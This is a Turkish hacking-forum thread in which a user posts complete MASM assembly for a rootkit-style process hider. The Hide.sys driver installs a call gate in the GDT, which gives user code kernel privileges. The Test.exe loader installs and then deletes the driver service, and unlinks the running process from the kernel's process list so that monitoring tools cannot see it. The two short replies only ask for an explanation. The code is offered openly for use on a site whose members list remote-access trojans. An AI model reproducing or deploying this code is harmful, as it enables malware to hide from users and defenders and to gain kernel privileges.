Smallest hideproc - CryptoSuite.ORG || The Best Encryption Platform Of The World

xafon · 10-02-09, 04:52

Hide.sys:

Kod:

.386
.model flat, stdcall
option casemap:none
include \masm32\include\w2k\ntstatus.inc
include \masm32\include\w2k\ntddk.inc

.code
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
pushfd
pushad
push edx
sgdt [esp-2]
pop edx
mov eax,edx
mov ecx,350h
.if dword ptr [edx+ecx+2]!=0ec000358h
mov byte ptr [edx],0c3h
mov word ptr [edx+ecx],ax
shr eax,16
mov word ptr [edx+ecx+6],ax
mov dword ptr [edx+ecx+2],0ec000358h
mov dword ptr [edx+ecx+8],0000ffffh
mov dword ptr [edx+ecx+12],00cf9a00h
.endif
popad
popfd
mov eax, STATUS_DEVICE_CONFIGURATION_ERROR
ret
DriverEntry endp
end DriverEntry

Test.exe

Kod:

.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\macros\macros.asm
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib

CTEXT MACRO text:VARARG
local TxtName
.data
TxtName BYTE text,0
.code
EXITM <ADDR TxtName>
ENDM

.data
Callgt dd 0
dw 353h

.code
start:
;Hidden Current Process
HideProc proc
local hSCManager:HANDLE
local hService:HANDLE
local acDriverPath[MAX_PATH]:CHAR
invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE
.if eax != NULL
mov hSCManager, eax
push eax
invoke GetFullPathName, CTXT("Hide.sys",0), sizeof acDriverPath, addr acDriverPath, esp
pop eax
invoke CreateService, hSCManager, CTXT("Hidden",0), CTXT("System",0), \
SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL
.if eax != NULL
mov hService, eax
invoke StartService, hService, 0, NULL
invoke DeleteService, hService
invoke CloseServiceHandle, hService
invoke CloseServiceHandle, hSCManager
.endif
.endif
call fword ptr [Callgt]
mov eax,esp
mov esp,[esp+4]
push eax
pushfd
pushad
mov eax,dword ptr ds:[0ffdff124h]
mov eax,[eax+44h]
mov ecx,088h
mov esi,dword ptr[eax+ecx]
mov edi,dword ptr[eax+ecx+4]
mov dword ptr[esi+4],edi
mov dword ptr[edi],esi
popad
popfd
pop esp
push offset Exit
retf
Exit:
KillProc:
Invoke GetAsyncKeyState, VK_F12
test eax,eax
jz KillProc
invoke ExitProcess,0
HideProc endp
end start

~~ßeyazWolfs~~ · 10-02-09, 07:04

Biraz Açıklama Yapabilirmisiniz Acaba?

ALCAPONE · 10-02-09, 09:11

assembly kodları bunlar

Konu Bilgileri
	Konu Başlığı Smallest hideproc	Konudaki Cevap Sayısı 2
	Şuan Bu Konuyu Görüntüleyenler	Görüntülenme Sayısı 122

10-02-09, 09:11	#3 (permalink)
ALCAPONE Member User ID : 3978 Messages : 434 Threads : 89 Thanks : 31 Rat : Kullanmıyorum CryptoSuite.Org	assembly kodları bunlar __________________ Sen Bilirsin!!!

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

10-02-09, 07:04	#2 (permalink)
~~ßeyazWolfs~~ Member Banned User ID : 4918 Messages : 30 Threads : 2 Thanks : 0 Rat : Poison CryptoSuite.Org	Biraz Açıklama Yapabilirmisiniz Acaba?

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)